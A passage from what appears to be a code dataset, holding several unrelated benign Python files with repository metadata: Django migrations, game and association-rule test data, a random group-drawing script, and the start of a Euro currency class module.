"BSD-3-Clause"
] | 3,293 | 2017-06-30T18:16:01.000Z | 2022-03-31T18:01:34.000Z | channels/migrations/0018_add_post_and_comment_fields.py | mitodl/open-discussions | ab6e9fac70b8a1222a84e78ba778a7a065c20541 | [
"BSD-3-Clause"
] | 1 | 2020-04-13T12:19:57.000Z | 2020-04-13T12:19:57.000Z | # Generated by Django 2.1.5 on 2019-01-18 19:04
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("channels", "0017_remove_unique"),
]
operations = [
migrations.AddField(
model_name="comment",
name="author",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="comment", name="deleted", field=models.BooleanField(null=True)
),
migrations.AddField(
model_name="comment", name="edited", field=models.BooleanField(null=True)
),
migrations.AddField(
model_name="comment", name="removed", field=models.BooleanField(null=True)
),
migrations.AddField(
model_name="comment", name="score", field=models.BigIntegerField(null=True)
),
migrations.AddField(
model_name="comment", name="text", field=models.TextField(null=True)
),
migrations.AddField(
model_name="post",
name="author",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="post", name="deleted", field=models.BooleanField(null=True)
),
migrations.AddField(
model_name="post", name="edited", field=models.BooleanField(null=True)
),
migrations.AddField(
model_name="post",
name="num_comments",
field=models.BigIntegerField(null=True),
),
migrations.AddField(
model_name="post", name="removed", field=models.BooleanField(null=True)
),
migrations.AddField(
model_name="post", name="score", field=models.BigIntegerField(null=True)
),
migrations.AddField(
model_name="post", name="text", field=models.TextField(null=True)
),
migrations.AddField(
model_name="post",
name="title",
field=models.CharField(max_length=300, null=True),
),
migrations.AddField(
model_name="post",
name="url",
field=models.URLField(max_length=2048, null=True),
),
]
| 33.1125 | 87 | 0.572291 | 256 | 2,649 | 5.808594 | 0.246094 | 0.181574 | 0.232011 | 0.27236 | 0.768662 | 0.768662 | 0.738399 | 0.738399 | 0.704775 | 0.704775 | 0 | 0.014169 | 0.307286 | 2,649 | 79 | 88 | 33.531646 | 0.796185 | 0.016988 | 0 | 0.630137 | 1 | 0 | 0.074558 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041096 | 0 | 0.082192 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
47ff264ac5ccd9a71d40e31f962a80ca71a13c27 | 2,229 | py | Python | web/transiq/restapi/migrations/0023_auto_20181029_1058.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | [
"Apache-2.0"
] | null | null | null | web/transiq/restapi/migrations/0023_auto_20181029_1058.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | [
"Apache-2.0"
] | 14 | 2020-06-05T23:06:45.000Z | 2022-03-12T00:00:18.000Z | web/transiq/restapi/migrations/0023_auto_20181029_1058.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.0.5 on 2018-10-29 10:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('restapi', '0022_auto_20181003_1919'),
]
operations = [
migrations.AlterField(
model_name='bookingstatuses',
name='status',
field=models.CharField(choices=[('confirmed', 'Confirmed'), ('loaded', 'Loaded'), ('lr_generated', 'Lr Generated'), ('advance_paid', 'Advance Paid'), ('unloaded', 'Unloaded'), ('pod_uploaded', 'PoD Uploaded'), ('pod_verified', 'PoD Verified'), ('invoice_raised', 'Invoice Raised'), ('invoice_confirmed', 'Invoice Confirmed'), ('balance_paid', 'Balance Paid'), ('party_invoice_sent', 'Party Invoice Sent'), ('inward_followup_completed', 'Inward Followup Completed'), ('complete', 'Complete')], default='confirmed', max_length=35, null=True),
),
migrations.AlterField(
model_name='bookingstatusesmapping',
name='booking_stage',
field=models.CharField(choices=[('in_progress', 'In Progress'), ('done', 'Done'), ('reverted', 'Reverted'), ('escalated', 'Escalated')], default='in_progress', max_length=15, null=True),
),
migrations.AlterField(
model_name='historicalbookingstatuses',
name='status',
field=models.CharField(choices=[('confirmed', 'Confirmed'), ('loaded', 'Loaded'), ('lr_generated', 'Lr Generated'), ('advance_paid', 'Advance Paid'), ('unloaded', 'Unloaded'), ('pod_uploaded', 'PoD Uploaded'), ('pod_verified', 'PoD Verified'), ('invoice_raised', 'Invoice Raised'), ('invoice_confirmed', 'Invoice Confirmed'), ('balance_paid', 'Balance Paid'), ('party_invoice_sent', 'Party Invoice Sent'), ('inward_followup_completed', 'Inward Followup Completed'), ('complete', 'Complete')], default='confirmed', max_length=35, null=True),
),
migrations.AlterField(
model_name='historicalbookingstatusesmapping',
name='booking_stage',
field=models.CharField(choices=[('in_progress', 'In Progress'), ('done', 'Done'), ('reverted', 'Reverted'), ('escalated', 'Escalated')], default='in_progress', max_length=15, null=True),
),
]
| 65.558824 | 552 | 0.646478 | 221 | 2,229 | 6.343891 | 0.307692 | 0.042796 | 0.071327 | 0.082739 | 0.805278 | 0.805278 | 0.784593 | 0.784593 | 0.784593 | 0.784593 | 0 | 0.021115 | 0.171377 | 2,229 | 33 | 553 | 67.545455 | 0.737953 | 0.020188 | 0 | 0.592593 | 1 | 0 | 0.453712 | 0.069661 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037037 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9a1a5c24cda44b9419993cc8a494ca2ca3d040ee | 2,193 | py | Python | pesis/pesis_old/engine/create_players.py | paulamh/pesis | c5ab10a96fc78c761c8c642f316c68acfb8a6892 | [
"BSD-2-Clause"
] | null | null | null | pesis/pesis_old/engine/create_players.py | paulamh/pesis | c5ab10a96fc78c761c8c642f316c68acfb8a6892 | [
"BSD-2-Clause"
] | null | null | null | pesis/pesis_old/engine/create_players.py | paulamh/pesis | c5ab10a96fc78c761c8c642f316c68acfb8a6892 | [
"BSD-2-Clause"
] | null | null | null | from ..objects import Player
from ..utils import dgv, prc_choice, rand_pick
def create_players(level_multiplier=1.):
    lm = level_multiplier
    nu = 2.
    # role pools (Finnish pesäpallo terms): player generations, inner-game
    # roles (batter/advancer/all-rounder) and outer-game roles
    gens = ('perusvarma', 'tulokas', 'konkari')
    ins = ('lyöjä', 'etenijä', 'yleispelaaja')
    outs = ('koppari', 'sieppari', 'polttaja', 'lukkari')
    # base skill value for players A through O
    levels = (14, 14, 13, 12, 12, 10, 10, 10, 10, 8, 8, 6, 6, 4, 4)
    ps = []
    for name, level in zip('ABCDEFGHIJKLMNO', levels):
        ps.append(Player('Player ' + name, dgv(level, 1) * lm, nu,
                         rand_pick(gens), rand_pick(ins), rand_pick(outs)))
    return ps
| 53.487805 | 67 | 0.566803 | 324 | 2,193 | 3.682099 | 0.175926 | 0.308466 | 0.176027 | 0.251467 | 0.791282 | 0.791282 | 0.791282 | 0.791282 | 0.791282 | 0.791282 | 0 | 0.025418 | 0.264478 | 2,193 | 40 | 68 | 54.825 | 0.714197 | 0 | 0 | 0.394737 | 0 | 0 | 0.090328 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.052632 | null | null | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7beb2c91b457cb0c558c1a7c46443d99172775ce | 140 | py | Python | zvt/domain/misc/__init__.py | Evergreen2020/zvt | 446a2512d716a38a12164b6d4468a6c9de01b986 | [
"MIT"
] | 6 | 2020-09-03T10:02:00.000Z | 2021-02-04T02:51:47.000Z | zvt/domain/misc/__init__.py | Evergreen2020/zvt | 446a2512d716a38a12164b6d4468a6c9de01b986 | [
"MIT"
] | 2 | 2019-12-20T13:12:30.000Z | 2020-01-03T06:24:30.000Z | zvt/domain/misc/__init__.py | Evergreen2020/zvt | 446a2512d716a38a12164b6d4468a6c9de01b986 | [
"MIT"
] | 2 | 2020-07-08T04:15:40.000Z | 2021-06-08T08:51:31.000Z | # -*- coding: utf-8 -*-
from zvt.domain.misc.holder import *
from zvt.domain.misc.money_flow import *
from zvt.domain.misc.overall import *
| 28 | 40 | 0.728571 | 22 | 140 | 4.590909 | 0.545455 | 0.207921 | 0.386139 | 0.504951 | 0.455446 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00813 | 0.121429 | 140 | 4 | 41 | 35 | 0.813008 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
d0385067e14cd963a9ed6c7d8d1474cf6d868a11 | 7,057 | py | Python | tests/test_cut_point.py | zStupan/NiaARM | 3ade6c5f89a22da7f1e7309cb4fec227bb913e6b | [
"MIT"
] | null | null | null | tests/test_cut_point.py | zStupan/NiaARM | 3ade6c5f89a22da7f1e7309cb4fec227bb913e6b | [
"MIT"
] | 14 | 2022-03-02T07:38:34.000Z | 2022-03-15T11:18:50.000Z | tests/test_cut_point.py | zStupan/NiaARM | 3ade6c5f89a22da7f1e7309cb4fec227bb913e6b | [
"MIT"
] | 1 | 2022-03-01T14:41:07.000Z | 2022-03-01T14:41:07.000Z | from unittest import TestCase
from niaarm.niaarm import NiaARM, _cut_point
from niaarm.feature import Feature
from niaarm.dataset import Dataset
import os
# The basic test for checking the identification of the appropriate cut point of an association rule.
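These tests exercise `_cut_point`, which maps a solution gene in [0, 1] to the index that splits a built rule into antecedent and consequent. A minimal sketch of the assumed mapping — inferred only from the values asserted in the tests below, not from the actual NiaARM implementation (its clamping rules may differ):

```python
def cut_point_sketch(sol: float, num_attr: int) -> int:
    """Map a gene in [0, 1] to a rule split index (assumed behaviour)."""
    cut = int(sol * num_attr)  # truncate towards zero
    return max(cut, 1)         # keep the antecedent non-empty

# Consistent with the assertions below (the Abalone cases build 9-feature rules):
assert cut_point_sketch(0.33333333, 9) == 2
assert cut_point_sketch(0.53333333, 9) == 4
assert cut_point_sketch(0.33333333, 2) == 1  # wiki test case
```

`cut_point_sketch` and its lower-bound clamp are illustrative assumptions only.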
class TestCutPoint(TestCase):
# let's borrow a test case from Wikipedia:
# https://en.wikipedia.org/wiki/Lift_(data_mining)
def setUp(self):
data = Dataset(os.path.join(os.path.dirname(__file__), 'test_data', 'wiki_test_case.csv'))
self.features = data.features
self.oper = NiaARM(data.dimension, data.features, data.transactions, ('support',))
def test_cut_pointA(self):
sol = [0.98328107, 0.93655004, 0.6860223, 0.78527931, 0.96291945, 0.18117294, 0.50567635, 0.33333333]
cut_value = sol[len(sol) - 1]
new_sol = sol[:-1]
cut = _cut_point(cut_value, len(self.features))
rule = self.oper.build_rule(new_sol)
# get antecedent and consequent of rule
antecedent = rule[:cut]
consequent = rule[cut:]
self.assertEqual(cut_value, 0.33333333)
self.assertEqual(new_sol, [0.98328107, 0.93655004, 0.6860223, 0.78527931, 0.96291945, 0.18117294, 0.50567635])
self.assertEqual(cut, 1)
self.assertEqual(antecedent, [Feature('Feat1', 'cat', categories=['B'])])
self.assertEqual(consequent, [None])
class TestCutPointB(TestCase):
def setUp(self):
data = Dataset(os.path.join(os.path.dirname(__file__), 'test_data', 'Abalone.csv'))
self.features = data.features
self.oper = NiaARM(data.dimension, data.features, data.transactions, ('support',))
def test_cut_pointB(self):
sol = [
0.35841534,
0.15056955,
0.57296633,
0.25275099,
0.1311689,
0.48081366,
0.86191609,
0.0,
0.4988256,
1.0,
0.23,
0.15337635,
0.91438008,
0.24168367,
0.1185402,
0.81325209,
0.67415024,
0.59137232,
0.1794402,
0.48980977,
0.13287764,
0.63728572,
0.3163273,
0.37061311,
0.52579599,
0.7206465,
0.72623934,
0.0,
0.57660376,
0.0694041,
0.35173438,
0.09158622,
0.74415574,
0.56159659,
0.49068101,
0.33333333]
new_sol_a = [
0.35841534,
0.15056955,
0.57296633,
0.25275099,
0.1311689,
0.48081366,
0.86191609,
0.0,
0.4988256,
1.0,
0.23,
0.15337635,
0.91438008,
0.24168367,
0.1185402,
0.81325209,
0.67415024,
0.59137232,
0.1794402,
0.48980977,
0.13287764,
0.63728572,
0.3163273,
0.37061311,
0.52579599,
0.7206465,
0.72623934,
0.0,
0.57660376,
0.0694041,
0.35173438,
0.09158622,
0.74415574,
0.56159659,
0.49068101]
cut_value = sol[len(sol) - 1]
new_sol = sol[:-1]
cut = _cut_point(cut_value, len(self.features))
rule = self.oper.build_rule(new_sol)
# get antecedent and consequent of rule
antecedent = rule[:cut]
consequent = rule[cut:]
self.assertEqual(cut_value, 0.33333333)
self.assertEqual(new_sol, new_sol_a)
self.assertEqual(cut, 2)
self.assertEqual(antecedent, [Feature('Length', 'float', min_val=0.2620357326, max_val=0.4989950842),
Feature('Height', 'float', min_val=0.5636729279999999, max_val=1.13)])
self.assertEqual(consequent, [None, None, None, None,
Feature('Diameter', 'float', 0.34108412769999996, 0.56784007355),
Feature('Sex', 'cat', categories=['I']),
Feature('Viscera weight', 'float', 0.13678483190000001, 0.44964727704)])
def test_cut_pointC(self):
sol = [
0.35841534,
0.15056955,
0.57296633,
0.25275099,
0.1311689,
0.48081366,
0.86191609,
0.0,
0.4988256,
1.0,
0.23,
0.15337635,
0.91438008,
0.24168367,
0.1185402,
0.81325209,
0.67415024,
0.59137232,
0.1794402,
0.48980977,
0.13287764,
0.63728572,
0.3163273,
0.37061311,
0.52579599,
0.7206465,
0.72623934,
0.0,
0.57660376,
0.0694041,
0.35173438,
0.09158622,
0.74415574,
0.56159659,
0.49068101,
0.53333333]
new_sol_a = [
0.35841534,
0.15056955,
0.57296633,
0.25275099,
0.1311689,
0.48081366,
0.86191609,
0.0,
0.4988256,
1.0,
0.23,
0.15337635,
0.91438008,
0.24168367,
0.1185402,
0.81325209,
0.67415024,
0.59137232,
0.1794402,
0.48980977,
0.13287764,
0.63728572,
0.3163273,
0.37061311,
0.52579599,
0.7206465,
0.72623934,
0.0,
0.57660376,
0.0694041,
0.35173438,
0.09158622,
0.74415574,
0.56159659,
0.49068101]
cut_value = sol[len(sol) - 1]
new_sol = sol[:-1]
cut = _cut_point(cut_value, len(self.features))
rule = self.oper.build_rule(new_sol)
# get antecedent and consequent of rule
antecedent = rule[:cut]
consequent = rule[cut:]
self.assertEqual(cut_value, 0.53333333)
self.assertEqual(new_sol, new_sol_a)
self.assertEqual(cut, 4)
self.assertEqual(antecedent, [Feature('Length', 'float', 0.2620357326, 0.4989950842),
Feature('Height', 'float', 0.5636729279999999, 1.13),
None, None])
self.assertEqual(consequent, [None, None,
Feature('Diameter', 'float', 0.34108412769999996, 0.56784007355),
Feature('Sex', 'cat', categories=['I']),
Feature('Viscera weight', 'float', 0.13678483190000001, 0.44964727704)])
| 29.041152 | 118 | 0.482925 | 727 | 7,057 | 4.603851 | 0.181568 | 0.011951 | 0.007171 | 0.021512 | 0.817747 | 0.783089 | 0.757395 | 0.757395 | 0.757395 | 0.757395 | 0 | 0.364336 | 0.410373 | 7,057 | 242 | 119 | 29.161157 | 0.440038 | 0.042511 | 0 | 0.859903 | 0 | 0 | 0.028444 | 0 | 0 | 0 | 0 | 0 | 0.072464 | 1 | 0.024155 | false | 0 | 0.024155 | 0 | 0.057971 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
d0cdc5142df4d73d6b955678e3582948448ab33b | 236 | py | Python | resources/util/toolbox/__init__.py | marrcio/relate-kanji | 1f21892e546194c65f87b42ee45bee706b21ec92 | [
"MIT"
] | null | null | null | resources/util/toolbox/__init__.py | marrcio/relate-kanji | 1f21892e546194c65f87b42ee45bee706b21ec92 | [
"MIT"
] | null | null | null | resources/util/toolbox/__init__.py | marrcio/relate-kanji | 1f21892e546194c65f87b42ee45bee706b21ec92 | [
"MIT"
] | null | null | null | from toolbox.filetools import *
from toolbox.graphictools import *
from toolbox.misctools import *
from toolbox.objecttools import *
from toolbox.webtools import *
from toolbox.kanjitools import *
from toolbox.dataqualitytools import *
| 29.5 | 38 | 0.822034 | 28 | 236 | 6.928571 | 0.357143 | 0.396907 | 0.525773 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118644 | 236 | 7 | 39 | 33.714286 | 0.932692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ef6e3b2a58ff7ab71c78722515f32e47818c61c4 | 8,352 | py | Python | tests/unit/story/story_service_data.py | hmajid2301/banter-bus-management-api | d51a40c2d5254d4197cbe5bb84aa576df2c24893 | [
"Apache-2.0"
] | null | null | null | tests/unit/story/story_service_data.py | hmajid2301/banter-bus-management-api | d51a40c2d5254d4197cbe5bb84aa576df2c24893 | [
"Apache-2.0"
] | null | null | null | tests/unit/story/story_service_data.py | hmajid2301/banter-bus-management-api | d51a40c2d5254d4197cbe5bb84aa576df2c24893 | [
"Apache-2.0"
] | null | null | null | from typing import List
from app.game.game_exceptions import GameNotFound
add_story_data = [
(
{
"game_name": "quibly",
"question": "how many fish are there?",
"round": "pair",
"answers": [
{
"nickname": "funnyMan420",
"answer": "one",
"votes": 12341,
},
{
"nickname": "lima_Bean",
"answer": "many",
"votes": 0,
},
],
}
),
(
{
"game_name": "drawlosseum",
"question": "fish",
"nickname": "i_cannotDraw",
"round": "drawing",
"answers": [
{
"start": {
"x": 100,
"y": -100,
},
"end": {
"x": 90,
"y": -100,
},
"color": "#000000",
},
],
}
),
(
{
"game_name": "fibbing_it",
"question": "What do you think about horses?",
"round": "opinion",
"answers": [
{
"answer": "tasty",
"nickname": "!sus",
},
{
"answer": "lame",
"nickname": "!normal_guy",
},
{
"answer": "lame",
"nickname": "normal_guy1",
},
],
}
),
]
add_story_fail_data = [
(
{
"question": "how many fish are there?",
"round": "pair",
"answers": [
{
"nickname": "funnyMan420",
"answer": "one",
"votes": 12341,
},
{
"nickname": "lima_Bean",
"answer": "many",
"votes": 0,
},
],
},
ValueError,
),
(
{
"game_name": "invalid",
"question": "how many fish are there?",
"round": "pair",
"answers": [
{
"nickname": "funnyMan420",
"answer": "one",
"votes": 12341,
},
{
"nickname": "lima_Bean",
"answer": "many",
"votes": 0,
},
],
},
GameNotFound,
),
(
{
"question": "how many fish are there?",
"game_name": "quibly",
"round": "invalid",
"answers": [
{
"nickname": "funnyMan420",
"answer": "one",
"votes": 12341,
},
{
"nickname": "lima_Bean",
"answer": "many",
"votes": 0,
},
],
},
ValueError,
),
(
{
"game_name": "quibly",
"question": "how many fish are there?",
"answers": [
{
"nickname": "funnyMan420",
"answer": "one",
"votes": 12341,
},
{
"nickname": "lima_Bean",
"answer": "many",
"votes": 0,
},
],
},
ValueError,
),
(
{
"round": "pair",
"answers": [
{
"nickname": "funnyMan420",
"answer": "one",
"votes": 12341,
},
{
"nickname": "lima_Bean",
"answer": "many",
"votes": 0,
},
],
},
ValueError,
),
(
{
"round": "pair",
"question": "how many fish are there?",
},
ValueError,
),
(
{
"game_name": "quibly",
"question": "how many fish are there?",
"round": "pair",
"nickname": "hello",
"answers": [
{
"nickname": "funnyMan420",
"answer": "one",
"votes": 12341,
},
{
"nickname": "lima_Bean",
"answer": "many",
"votes": 0,
},
],
},
ValueError,
),
(
{
"game_name": "drawlosseum",
"question": "fish",
"answers": [
{
"start": {
"x": 100,
"y": -100,
},
"end": {
"x": 90,
"y": -100,
},
"color": "#000000",
},
],
},
ValueError,
),
(
{
"nickname": "i_cannotDraw",
"round": "opinion",
"answers": [
{
"answer": "tasty",
"nickname": "!sus",
},
{
"answer": "lame",
"nickname": "!normal_guy",
},
{
"answer": "lame",
"nickname": "normal_guy1",
},
],
},
ValueError,
),
(
{
"game_name": "fibbing_it",
"nickname": "i_cannotDraw",
"round": "invalid",
"answers": [
{
"answer": "tasty",
"nickname": "!sus",
},
{
"answer": "lame",
"nickname": "!normal_guy",
},
{
"answer": "lame",
"nickname": "normal_guy1",
},
],
},
ValueError,
),
(
{
"game_name": "fibbing_it",
"question": "What do you think about horses?",
"round": "opinion",
"nickname": "!sus",
"answers": [
{
"answer": "tasty",
"nickname": "!sus",
},
{
"answer": "lame",
"nickname": "!normal_guy",
},
{
"answer": "lame",
"nickname": "normal_guy1",
},
],
},
ValueError,
),
(
{
"game_name": "fibbing_it",
"question": "What do you think about horses?",
"answers": [
{
"answer": "tasty",
"nickname": "!sus",
},
{
"answer": "lame",
"nickname": "!normal_guy",
},
{
"answer": "lame",
"nickname": "normal_guy1",
},
],
},
ValueError,
),
]
all_games_enabled: List[dict] = [
{
"name": "quibly",
"rules_url": "https://gitlab.com/banter-bus/banter-bus-server/-/wikis/docs/rules/quibly",
"enabled": True,
"description": "A game about quibbing.",
"display_name": "Quibly",
},
{
"name": "fibbing_it",
"rules_url": "https://gitlab.com/banter-bus/banter-bus-server/-/wikis/docs/rules/fibbing_it",
"enabled": True,
"description": "A game about lying.",
"display_name": "Fibbing IT!",
},
{
"name": "drawlosseum",
"rules_url": "https://google.com/drawlosseum",
"enabled": True,
"description": "A game about drawing.",
"display_name": "Drawlosseum",
},
]
| 25.619632 | 101 | 0.287955 | 448 | 8,352 | 5.254464 | 0.185268 | 0.037383 | 0.076466 | 0.101954 | 0.813509 | 0.790569 | 0.726848 | 0.726848 | 0.726848 | 0.726848 | 0 | 0.028603 | 0.573036 | 8,352 | 325 | 102 | 25.698462 | 0.63152 | 0 | 0 | 0.560748 | 0 | 0.006231 | 0.26341 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.006231 | 0 | 0.006231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ef93c1668ff4f9b514a4b9b32e1482a91a8df8f7 | 3,490 | py | Python | Aulas de JS/exercicios_fora_de_aula/sorteador.py | BEp0/Estudos_Web | 06cdabd482034533c080dc0c7978ba190844edf7 | [
"MIT"
] | null | null | null | Aulas de JS/exercicios_fora_de_aula/sorteador.py | BEp0/Estudos_Web | 06cdabd482034533c080dc0c7978ba190844edf7 | [
"MIT"
] | null | null | null | Aulas de JS/exercicios_fora_de_aula/sorteador.py | BEp0/Estudos_Web | 06cdabd482034533c080dc0c7978ba190844edf7 | [
"MIT"
] | null | null | null | from random import shuffle
print('Sorteador (draws a random order for 2 to 8 groups/people)...')
numero_de_alunos = int(input('How many groups do you want to shuffle? '))
ordinals = ('First', 'Second', 'Third', 'Fourth', 'Fifth', 'Sixth',
            'Seventh', 'Eighth')
if 2 <= numero_de_alunos <= 8:
    # one prompt per group/student, labelled with the matching ordinal
    lista = [input('{} group/student: '.format(ordinals[i]))
             for i in range(numero_de_alunos)]
    shuffle(lista)  # randomize the order in place
    print('The order of the groups/students is: {}'.format(lista))
else:
    print('Please enter a number between 2 and 8.')
print('_FIM_') | 46.533333 | 91 | 0.652436 | 517 | 3,490 | 4.396518 | 0.133462 | 0.123185 | 0.110867 | 0.117026 | 0.856577 | 0.856577 | 0.850418 | 0.842939 | 0.83414 | 0.824021 | 0 | 0.035069 | 0.191117 | 3,490 | 75 | 92 | 46.533333 | 0.765143 | 0.144126 | 0 | 0.716418 | 0 | 0 | 0.408184 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.014925 | 0 | 0.014925 | 0.134328 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
efb659417142ed3ebe31414ca5982bd58e77e72a | 62,899 | py | Python | multicurrency/euro.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | 2 | 2021-03-26T18:19:57.000Z | 2021-07-27T01:15:50.000Z | multicurrency/euro.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | null | null | null | multicurrency/euro.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
#
# copyright: 2020-2022, Frederico Martins
# author: Frederico Martins <http://github.com/fscm>
# license: SPDX-License-Identifier: MIT
"""Euro currency representation(s)."""
from decimal import Decimal
from typing import Optional, Union
from .currency import Currency
class Euro(Currency):
"""Euro currency representation.
Simple usage example:
>>> from multicurrency import Euro
>>> euro = Euro(
... amount=123456.789)
>>> print(euro)
123.456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'Euro':
"""Class creator.
Returns:
            Euro: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroSBA(Currency):
"""EuroSBA currency representation.
Simple usage example:
>>> from multicurrency import EuroSBA
>>> eurosba = EuroSBA(
... amount=123456.789)
>>> print(eurosba)
123.456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroSBA':
"""Class creator.
Returns:
EuroSBA: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroAD(Currency):
"""EuroAD currency representation.
Simple usage example:
>>> from multicurrency import EuroAD
>>> euroad = EuroAD(
... amount=123456.789)
>>> print(euroad)
123.456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
